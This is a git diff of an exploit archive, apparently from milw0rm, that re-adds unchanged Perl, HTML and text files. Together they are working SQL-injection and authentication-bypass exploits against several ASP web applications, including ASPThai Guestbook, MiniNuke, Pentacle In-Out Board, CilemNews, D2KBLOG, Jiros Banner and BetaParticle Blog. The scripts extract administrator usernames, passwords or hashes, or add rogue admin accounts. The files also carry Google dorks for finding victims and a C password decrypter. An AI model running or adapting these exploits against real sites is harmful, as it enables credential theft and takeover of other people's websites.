= $2; -$info=~m/(value=\")(\n+|\w+|\W+)/g; -$Pass= $2; - -print "UserName:$User\r\nPassword:$Pass\r\n"; - -sub head() - { - print "\n=======================================================================\r\n"; - print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n"; - print "=======================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: Thaisql.pl \r\n\n"; - print " - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n"; - print "=======================================================================\r\n"; - print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n"; - print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n"; - print "=======================================================================\r\n"; - -# milw0rm.com [2006-02-06] +#!/usr/bin/perl +# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5 +#(And possible higher could not find a site to test it on) +# This exploit shows the username of the administrator and the password In plain text +# Bug Found by muderskillz Coded by Zodiac +# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot. +# http://exploitercode.com/ http://www.g00ns.net +#irc.g00ns.net #g00ns email = zodiac@g00ns.net +#(c) 2006 + +use LWP::UserAgent; +use HTTP::Cookies; + +$Server = $ARGV[0]; + +if($Server =~m/http/g) +{ +$Server=~ 'http://$Server'; +print +} +else { + print $error; +} + +if(!$Server) {usage();exit() ;} + +head(); + +print "\r\nGrabbing Username And Password\r\n\n"; + +#Login's and stores a cookie to view admin panel later + + + $xpl = LWP::UserAgent->new() or die; + $cookie_jar = HTTP::Cookies->new(); + + $xpl->agent('g00ns'); + $xpl->cookie_jar($cookie_jar); + + $res = $xpl->post( + $Server.'check_user.asp', + Content => [ + + 'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', + 'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', + 'Submit' => '-= Login =-', + ], + ); + +# Create a request +my $req = HTTP::Request->new(GET => + +$Server.'change_admin_username.asp' + +); + +$req->header('Referer', $Server.'admin_menu.asp'); + +my $res = $xpl->request($req); + +$info= $res->content; + +if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) +{ + die "Error Connecting...\r\n"; +} + +#Check the outcome of the response + +$info=~m/(value=\")(\n+|\w+|\W+)/g; +$User = $2; +$info=~m/(value=\")(\n+|\w+|\W+)/g; +$Pass= $2; + +print "UserName:$User\r\nPassword:$Pass\r\n"; + +sub head() + { + print "\n=======================================================================\r\n"; + print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n"; + print "=======================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: Thaisql.pl \r\n\n"; + print " - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n"; + print "=======================================================================\r\n"; + print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n"; + print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n"; + print "=======================================================================\r\n"; + +# milw0rm.com [2006-02-06] diff --git a/platforms/asp/webapps/1514.pl b/platforms/asp/webapps/1514.pl index 8eb4b4dd9..7316c1e80 100755 --- a/platforms/asp/webapps/1514.pl +++ b/platforms/asp/webapps/1514.pl @@ -1,50 +1,50 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Orginal advisory: http://www.nukedx.com/?viewdoc=9 -#Usage: mini.pl -use IO::Socket; -if(@ARGV != 3){ -print " -+**********************************************************************+ -+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+ -+ Usage: mini.pl + -+ Example: mini.pl sux.com / 1 + -+ Method found & Exploit scripted by nukedx + -+**********************************************************************+ -"; -exit(); -} -#Local variables -$server = $ARGV[0]; -$server =~ s/(http:\/\/)//eg; -$port = "80"; -$mndir = $ARGV[1]; -$victimid = $ARGV[2]; -$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid; -#Writing data to socket -print "+**********************************************************************+\n"; -print "+ Trying to connect: $server\n"; -$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; -print $mns "GET $sreq\n"; -print $mns "Host: $server\n"; -print $mns "Accept: */*\n"; -print $mns "Connection: close\n\n"; -print "+ Connected!...\n"; - while($answer = <$mns>) { - if ($answer =~ /([\d,a-f]{32})/) { - print "+ USERID: $victimid\n"; - print "+ MD5 HASH: $1\n"; - print "+**********************************************************************+\n"; - exit(); } - if ($answer =~ /number of columns/) { - print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n"; - print "+ So please edit query by manually adding null data..\n"; - exit(); } - } -print "+ Exploit failed\n"; -print "+**********************************************************************+\n"; - -# nukedx.com [2006-02-19] - -# milw0rm.com [2006-02-19] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Orginal advisory: http://www.nukedx.com/?viewdoc=9 +#Usage: mini.pl +use IO::Socket; +if(@ARGV != 3){ +print " ++**********************************************************************+ ++Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+ ++ Usage: mini.pl + ++ Example: mini.pl sux.com / 1 + ++ Method found & Exploit scripted by nukedx + ++**********************************************************************+ +"; +exit(); +} +#Local variables +$server = $ARGV[0]; +$server =~ s/(http:\/\/)//eg; +$port = "80"; +$mndir = $ARGV[1]; +$victimid = $ARGV[2]; +$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid; +#Writing data to socket +print "+**********************************************************************+\n"; +print "+ Trying to connect: $server\n"; +$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; +print $mns "GET $sreq\n"; +print $mns "Host: $server\n"; +print $mns "Accept: */*\n"; +print $mns "Connection: close\n\n"; +print "+ Connected!...\n"; + while($answer = <$mns>) { + if ($answer =~ /([\d,a-f]{32})/) { + print "+ USERID: $victimid\n"; + print "+ MD5 HASH: $1\n"; + print "+**********************************************************************+\n"; + exit(); } + if ($answer =~ /number of columns/) { + print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n"; + print "+ So please edit query by manually adding null data..\n"; + exit(); } + } +print "+ Exploit failed\n"; +print "+**********************************************************************+\n"; + +# nukedx.com [2006-02-19] + +# milw0rm.com [2006-02-19] diff --git a/platforms/asp/webapps/1528.pl b/platforms/asp/webapps/1528.pl index 88b0dcbff..32f2dc87b 100755 --- a/platforms/asp/webapps/1528.pl +++ b/platforms/asp/webapps/1528.pl @@ -1,70 +1,70 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Usage: penta.pl -#Original Advisory: http://www.nukedx.com/?viewdoc=14 -use IO::Socket; -if(@ARGV < 3){ -print " -+***********************************************************************+ -+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+ -+ Usage: penta.pl + -+ Example: penta.pl sux.com / 1 + -+ Method found & Exploit scripted by nukedx + -+***********************************************************************+ -"; -exit(); -} -#Local variables -$pentaserver = $ARGV[0]; -$pentaserver =~ s/(http:\/\/)//eg; -$pentahost = "http://".$pentaserver; -$port = "80"; -$pentadir = $ARGV[1]; -$pentaid = $ARGV[2]; -$pentatar = "newsdetailsview.asp?newsid="; -$pentafinal = "login.asp"; -$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes"; -$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp; -#Writing data to socket -print "+**********************************************************************+\n"; -print "+ Trying to connect: $pentaserver\n"; -$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n"; -print $penta "GET $pentareq\n"; -print $penta "Host: $pentaserver\n"; -print $penta "Accept: */*\n"; -print $penta "Connection: close\n\n"; -print "+ Connected!...\n"; -while($answer = <$penta>) { -if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){ -print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n"; -print "+ ---------------- +\n"; -print "+ USERNAME: $1\n"; -} -if ($answer =~ /(.*?) /) { -print "+ PASSWORD: $1\n"; -print "+ ---------------- +\n"; -print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n"; -print "+**********************************************************************+\n"; -exit(); -} -if ($answer =~ /Internal Server Error/) { -print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n"; -print "+ So please edit query by manually adding or removing null datas..\n"; -print "+**********************************************************************+\n"; -exit(); -} -if ($answer =~ /number of columns/) { -print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n"; -print "+ So please edit query by manually adding or removing null datas..\n"; -print "+**********************************************************************+\n"; -exit(); -} -} -print "+ Try another userid maybe this one not the admin.\n"; -print "+ Exploit failed :(\n"; -print "+**********************************************************************+\n"; - -# nukedx.com [2006-02-25] - -# milw0rm.com [2006-02-25] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Usage: penta.pl +#Original Advisory: http://www.nukedx.com/?viewdoc=14 +use IO::Socket; +if(@ARGV < 3){ +print " ++***********************************************************************+ ++Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+ ++ Usage: penta.pl + ++ Example: penta.pl sux.com / 1 + ++ Method found & Exploit scripted by nukedx + ++***********************************************************************+ +"; +exit(); +} +#Local variables +$pentaserver = $ARGV[0]; +$pentaserver =~ s/(http:\/\/)//eg; +$pentahost = "http://".$pentaserver; +$port = "80"; +$pentadir = $ARGV[1]; +$pentaid = $ARGV[2]; +$pentatar = "newsdetailsview.asp?newsid="; +$pentafinal = "login.asp"; +$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes"; +$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp; +#Writing data to socket +print "+**********************************************************************+\n"; +print "+ Trying to connect: $pentaserver\n"; +$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n"; +print $penta "GET $pentareq\n"; +print $penta "Host: $pentaserver\n"; +print $penta "Accept: */*\n"; +print $penta "Connection: close\n\n"; +print "+ Connected!...\n"; +while($answer = <$penta>) { +if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){ +print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n"; +print "+ ---------------- +\n"; +print "+ USERNAME: $1\n"; +} +if ($answer =~ /(.*?) /) { +print "+ PASSWORD: $1\n"; +print "+ ---------------- +\n"; +print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n"; +print "+**********************************************************************+\n"; +exit(); +} +if ($answer =~ /Internal Server Error/) { +print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n"; +print "+ So please edit query by manually adding or removing null datas..\n"; +print "+**********************************************************************+\n"; +exit(); +} +if ($answer =~ /number of columns/) { +print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n"; +print "+ So please edit query by manually adding or removing null datas..\n"; +print "+**********************************************************************+\n"; +exit(); +} +} +print "+ Try another userid maybe this one not the admin.\n"; +print "+ Exploit failed :(\n"; +print "+**********************************************************************+\n"; + +# nukedx.com [2006-02-25] + +# milw0rm.com [2006-02-25] diff --git a/platforms/asp/webapps/1529.htm b/platforms/asp/webapps/1529.htm index b84aa3f62..b9cac6b23 100755 --- a/platforms/asp/webapps/1529.htm +++ b/platforms/asp/webapps/1529.htm @@ -1,36 +1,36 @@ - -Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability - - - -Fill in the blank !:D
-Just enter host/path/ not http://host/path/!
-If Pentacle installed on / just enter host
-Example: host.com
-Example2: host.com/ptdir/
-
-Target -> - - - -
- - -Save this code as .htm and then execute. - -# nukedx.com [2006-02-25] - -# milw0rm.com [2006-02-25] + +Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability + + + +Fill in the blank !:D
+Just enter host/path/ not http://host/path/!
+If Pentacle installed on / just enter host
+Example: host.com
+Example2: host.com/ptdir/
+
+Target -> + + + +
+ + +Save this code as .htm and then execute. + +# nukedx.com [2006-02-25] + +# milw0rm.com [2006-02-25] diff --git a/platforms/asp/webapps/1550.txt b/platforms/asp/webapps/1550.txt index d1d1b63d4..a97723d37 100755 --- a/platforms/asp/webapps/1550.txt +++ b/platforms/asp/webapps/1550.txt @@ -1,66 +1,66 @@ -Original advisory: http://www.nukedx.com/?viewdoc=18 -Advisory by: nukedx -Full PoC -Explotation: -GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL] -EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores -EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores -with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name -[PageID]: must be working page id you can get some from frontpage. -<--Decrypter code--> -<--Note: This decrypter just decrypts default data -If webmaster changed te_chave value in funcoes.asp -this decrypter wont decrypt data so you need to -make your own decrypter ---> -<--C Source--> -/********************************************* -* TotalECommerce PWD Decrypter * -* Coded by |SaMaN| for nukedx * -* http://www.k9world.org * -* IRC.K9World.Org * -*Advisory: http://www.nukedx.com/?viewdoc=18 * -**********************************************/ -#include -#include -#include -#include - -int main() -{ - char buf[255]; - char buf2[255]; - char buf3[255]; - char *texto; - char *vcrypt; - int i,x,z,t = 0; - char saman; - texto = buf; - vcrypt = buf2; - printf("%s", "|=------------------------------------=|\n"); - printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n"); - printf("%s", "|=------------------------------------=|\n\n"); - printf("%s", "Enter crypted password: "); - scanf("%200s", buf); - if (!texto) - vcrypt = ""; - - for (i = 0; i < strlen(texto); i++) - { - if ((vcrypt == "") || (i > strlen(texto))) - x = 1; - else - x = x + 1; - t = buf[i]; - z = 255 - t; - saman = toascii(z); - snprintf(buf3, 250, "%c", saman); - strncat(buf2, buf3, 250); - } - printf("Result: %s\n", buf2); - return; -} -<--End of code--> -<--Thanks |SaMaN| for decrypter--> - -// milw0rm.com [2006-03-04] +Original advisory: http://www.nukedx.com/?viewdoc=18 +Advisory by: nukedx +Full PoC +Explotation: +GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL] +EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores +EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores +with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name +[PageID]: must be working page id you can get some from frontpage. +<--Decrypter code--> +<--Note: This decrypter just decrypts default data +If webmaster changed te_chave value in funcoes.asp +this decrypter wont decrypt data so you need to +make your own decrypter +--> +<--C Source--> +/********************************************* +* TotalECommerce PWD Decrypter * +* Coded by |SaMaN| for nukedx * +* http://www.k9world.org * +* IRC.K9World.Org * +*Advisory: http://www.nukedx.com/?viewdoc=18 * +**********************************************/ +#include +#include +#include +#include + +int main() +{ + char buf[255]; + char buf2[255]; + char buf3[255]; + char *texto; + char *vcrypt; + int i,x,z,t = 0; + char saman; + texto = buf; + vcrypt = buf2; + printf("%s", "|=------------------------------------=|\n"); + printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n"); + printf("%s", "|=------------------------------------=|\n\n"); + printf("%s", "Enter crypted password: "); + scanf("%200s", buf); + if (!texto) + vcrypt = ""; + + for (i = 0; i < strlen(texto); i++) + { + if ((vcrypt == "") || (i > strlen(texto))) + x = 1; + else + x = x + 1; + t = buf[i]; + z = 255 - t; + saman = toascii(z); + snprintf(buf3, 250, "%c", saman); + strncat(buf2, buf3, 250); + } + printf("Result: %s\n", buf2); + return; +} +<--End of code--> +<--Thanks |SaMaN| for decrypter--> + +// milw0rm.com [2006-03-04] diff --git a/platforms/asp/webapps/1562.pl b/platforms/asp/webapps/1562.pl index 2ec781a13..0ad48e207 100755 --- a/platforms/asp/webapps/1562.pl +++ b/platforms/asp/webapps/1562.pl @@ -1,68 +1,68 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Usage: cilem.pl -#Original Advisory: http://www.nukedx.com/?viewdoc=10 -#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages... -use IO::Socket; -if(@ARGV < 2){ -print " -+***********************************************************************+ -+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+ -+ Usage: cilem.pl + -+ Example: cilem.pl sux.com / + -+ googledork [ inurl:yazdir.asp?haber_id= ] + -+ Method found & Exploit scripted by nukedx + -+***********************************************************************+ -"; -exit(); -} -#Local variables -$cilemserver = $ARGV[0]; -$cilemserver =~ s/(http:\/\/)//eg; -$cilemhost = "http://".$cilemserver; -$port = "80"; -$cilemdir = $ARGV[1]; -$cilemtar = "yazdir.asp?haber_id="; -$cilemfinal = "admin/giris.asp"; -$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin"; -$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp; -#Writing data to socket -print "+**********************************************************************+\n"; -print "+ Trying to connect: $cilemserver\n"; -$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n"; -print $cilem "GET $cilemreq\n"; -print $cilem "Host: $cilemserver\n"; -print $cilem "Accept: */*\n"; -print $cilem "Connection: close\n\n"; -print "+ Connected!...\n"; -while($answer = <$cilem>) { -if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){ -print "+ Exploit succeed! Getting admin's information.\n"; -print "+ ---------------- +\n"; -print "+ USERNAME: $1\n"; -} -if ($answer =~ /(.*?)<\/font><\/td>/) { -print "+ PASSWORD: $1\n"; -print "+ ---------------- +\n"; -print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n"; -print "+**********************************************************************+\n"; -exit(); -} -if ($answer =~ /Internal Server Error/) { -print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n"; -print "+ So please edit query by manually adding or removing null datas..\n"; -print "+**********************************************************************+\n"; -exit(); -} -if ($answer =~ /number of columns/) { -print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n"; -print "+ So please edit query by manually adding or removing null datas..\n"; -print "+**********************************************************************+\n"; -exit(); -} -} -print "+ Exploit failed :(\n"; -print "+**********************************************************************+\n"; - -# milw0rm.com [2006-03-07] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Usage: cilem.pl +#Original Advisory: http://www.nukedx.com/?viewdoc=10 +#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages... +use IO::Socket; +if(@ARGV < 2){ +print " ++***********************************************************************+ ++Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+ ++ Usage: cilem.pl + ++ Example: cilem.pl sux.com / + ++ googledork [ inurl:yazdir.asp?haber_id= ] + ++ Method found & Exploit scripted by nukedx + ++***********************************************************************+ +"; +exit(); +} +#Local variables +$cilemserver = $ARGV[0]; +$cilemserver =~ s/(http:\/\/)//eg; +$cilemhost = "http://".$cilemserver; +$port = "80"; +$cilemdir = $ARGV[1]; +$cilemtar = "yazdir.asp?haber_id="; +$cilemfinal = "admin/giris.asp"; +$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin"; +$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp; +#Writing data to socket +print "+**********************************************************************+\n"; +print "+ Trying to connect: $cilemserver\n"; +$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n"; +print $cilem "GET $cilemreq\n"; +print $cilem "Host: $cilemserver\n"; +print $cilem "Accept: */*\n"; +print $cilem "Connection: close\n\n"; +print "+ Connected!...\n"; +while($answer = <$cilem>) { +if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){ +print "+ Exploit succeed! Getting admin's information.\n"; +print "+ ---------------- +\n"; +print "+ USERNAME: $1\n"; +} +if ($answer =~ /(.*?)<\/font><\/td>/) { +print "+ PASSWORD: $1\n"; +print "+ ---------------- +\n"; +print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n"; +print "+**********************************************************************+\n"; +exit(); +} +if ($answer =~ /Internal Server Error/) { +print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n"; +print "+ So please edit query by manually adding or removing null datas..\n"; +print "+**********************************************************************+\n"; +exit(); +} +if ($answer =~ /number of columns/) { +print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n"; +print "+ So please edit query by manually adding or removing null datas..\n"; +print "+**********************************************************************+\n"; +exit(); +} +} +print "+ Exploit failed :(\n"; +print "+**********************************************************************+\n"; + +# milw0rm.com [2006-03-07] diff --git a/platforms/asp/webapps/1569.pl b/platforms/asp/webapps/1569.pl index 55e9b7270..6216d6af5 100755 --- a/platforms/asp/webapps/1569.pl +++ b/platforms/asp/webapps/1569.pl @@ -1,55 +1,55 @@ - #!/usr/bin/perl -w - # D2KBLOG SQL injection - # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ] - # Exploited by : devil_box [ devil_box [at} kapda.ir ] - # member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net) - -require LWP::UserAgent; -require HTTP::Request; -print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n"; -print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n"; -print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n"; -print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n"; -print "\r\n=-=-=-==================================================================-=-=-=\r\n"; - - if (@ARGV != 2) - { - print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n"; - print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n"; - exit (); - } - - -my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,); - -my $Path = $ARGV[0]; - -my $Page = $ARGV[1]; - -my $URL = "http://".$Path.$Page; - -print "|***| Connecting to ".$URL." ...\r\n"; - -$r = HTTP::Request->new(GET => $URL."?action=edit"); - -$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=" ); - -$res = $ua->request($r); - -print "|***| Connected !\r\n"; - -if ($res->is_success) { - - print "|***| Extracting Username and Password ...\r\n\r\n"; - - my $results = $res->content; - - while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; } - - print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n"; - - } else { - die "\r\n|***| ".$res->status_line; - } - -# milw0rm.com [2006-03-09] + #!/usr/bin/perl -w + # D2KBLOG SQL injection + # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ] + # Exploited by : devil_box [ devil_box [at} kapda.ir ] + # member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net) + +require LWP::UserAgent; +require HTTP::Request; +print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n"; +print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n"; +print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n"; +print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n"; +print "\r\n=-=-=-==================================================================-=-=-=\r\n"; + + if (@ARGV != 2) + { + print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n"; + print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n"; + exit (); + } + + +my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,); + +my $Path = $ARGV[0]; + +my $Page = $ARGV[1]; + +my $URL = "http://".$Path.$Page; + +print "|***| Connecting to ".$URL." ...\r\n"; + +$r = HTTP::Request->new(GET => $URL."?action=edit"); + +$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=" ); + +$res = $ua->request($r); + +print "|***| Connected !\r\n"; + +if ($res->is_success) { + + print "|***| Extracting Username and Password ...\r\n\r\n"; + + my $results = $res->content; + + while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; } + + print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n"; + + } else { + die "\r\n|***| ".$res->status_line; + } + +# milw0rm.com [2006-03-09] diff --git a/platforms/asp/webapps/1571.htm b/platforms/asp/webapps/1571.htm index 8340cc3ff..9fe635510 100755 --- a/platforms/asp/webapps/1571.htm +++ b/platforms/asp/webapps/1571.htm @@ -1,57 +1,57 @@ - -Jiros Banner Experience Pro Unauthorized Admin Add Exploit - - - - - -
-

-Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
-This exploit has been coded by nukedx
-You can found original advisory on http://www.nukedx.com/?viewdoc=19
-Dork for this exploit: inurl:JBSPro
-Your target must be like that: www.victim.com/Path/
-The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
-If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
-For second example your target must be www.victim.com/
-You can login with your admin account via www.victim.com/JBSPath/files/login.asp
-Have phun
-

-Target -> 
-
-
-
-
-
-
-

-
- - - - - -Save this code as .htm and then execute. - -# nukedx.com [2006-03-07] - -# milw0rm.com [2006-03-09] + +Jiros Banner Experience Pro Unauthorized Admin Add Exploit + + + + + +
+

+Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
+This exploit has been coded by nukedx
+You can found original advisory on http://www.nukedx.com/?viewdoc=19
+Dork for this exploit: inurl:JBSPro
+Your target must be like that: www.victim.com/Path/
+The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
+If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
+For second example your target must be www.victim.com/
+You can login with your admin account via www.victim.com/JBSPath/files/login.asp
+Have phun
+

+Target -> 
+
+
+
+
+
+
+

+
+ + + + + +Save this code as .htm and then execute. + +# nukedx.com [2006-03-07] + +# milw0rm.com [2006-03-09] diff --git a/platforms/asp/webapps/1589.pl b/platforms/asp/webapps/1589.pl index ea49237b3..81f051bd1 100755 --- a/platforms/asp/webapps/1589.pl +++ b/platforms/asp/webapps/1589.pl @@ -1,67 +1,67 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=20 -#Usage: beta.pl -#googledork: [ "Powered by bp blog" ] 9.710 pages.. -use IO::Socket; -if(@ARGV != 2) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-20\r\n"; - print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to BetaParticle ex: /blog\r\n"; - exit(); -} -sub exploit () { - #Our variables... - $bpserver = $ARGV[0]; - $bpserver =~ s/(http:\/\/)//eg; - $bphost = "http://".$bpserver; - $bpdir = $ARGV[1]; - $bpport = "80"; - $bptar = "template_gallery_detail.asp?fldGalleryID="; - $bpfinal = "main.asp"; - $bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1"; - $bpreq = $bphost.$bpdir.$bptar.$bpxp; - #Sending data... - header(); - print "- Trying to connect: $bpserver\r\n"; - $bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n"; - print $bp "GET $bpreq HTTP/1.1\n"; - print $bp "Accept: */*\n"; - print $bp "Referer: $bphost\n"; - print $bp "Accept-Language: tr\n"; - print $bp "User-Agent: NukeZilla 4.3\n"; - print $bp "Cache-Control: no-cache\n"; - print $bp "Host: $bpserver\n"; - print $bp "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$bp>) { 